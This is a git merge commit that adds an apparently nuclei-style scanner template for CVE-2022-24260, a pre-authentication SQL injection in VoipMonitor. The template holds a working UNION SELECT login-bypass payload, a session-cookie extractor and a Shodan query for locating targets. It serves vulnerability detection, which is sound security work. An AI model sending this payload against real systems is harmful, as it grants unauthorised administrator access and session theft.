Merge pull request #3831 from gy741/rule-add-v99

Create CVE-2022-24260.yaml
2022-03-04 20:48:18 +05:30 · 2022-03-04 20:48:18 +05:30 · 8a8913b916
parent a27b011b58 657c4cc1f7
commit 8a8913b916
2 changed files with 48 additions and 1 deletions
--- a/.new-additions
+++ b/.new-additions
@ -43,4 +43,4 @@ vulnerabilities/cisco/cucm-username-enumeration.yaml
 vulnerabilities/other/microweber-xss.yaml
 vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
 vulnerabilities/wordpress/wp-adaptive-xss.yaml
-vulnerabilities/wordpress/wp-qards-listing.yaml
+vulnerabilities/wordpress/wp-qards-listing.yaml
--- a/cves/2022/CVE-2022-24260.yaml
+++ b/cves/2022/CVE-2022-24260.yaml
@ -0,0 +1,47 @@
+id: CVE-2022-24260
+
+info:
+  name: VoipMonitor - Pre-Auth SQL injection
+  author: gy741
+  severity: critical
+  description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
+  reference:
+    - https://kerbit.io/research/read/blog/3
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24260
+    - https://www.voipmonitor.org/changelog-gui?major=5
+  metadata:
+    shodan-query: http.title:"VoIPmonitor"
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 9.80
+    cve-id: CVE-2022-24260
+    cwe-id: CWE-89
+  tags: cve,cve2022,voipmonitor,sqli,unauth
+
+requests:
+  - raw:
+      - |
+        POST /api.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded
+
+        module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"success":true'
+          - '_vm_version'
+          - '_debug'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: kval
+        kval:
+          - PHPSESSID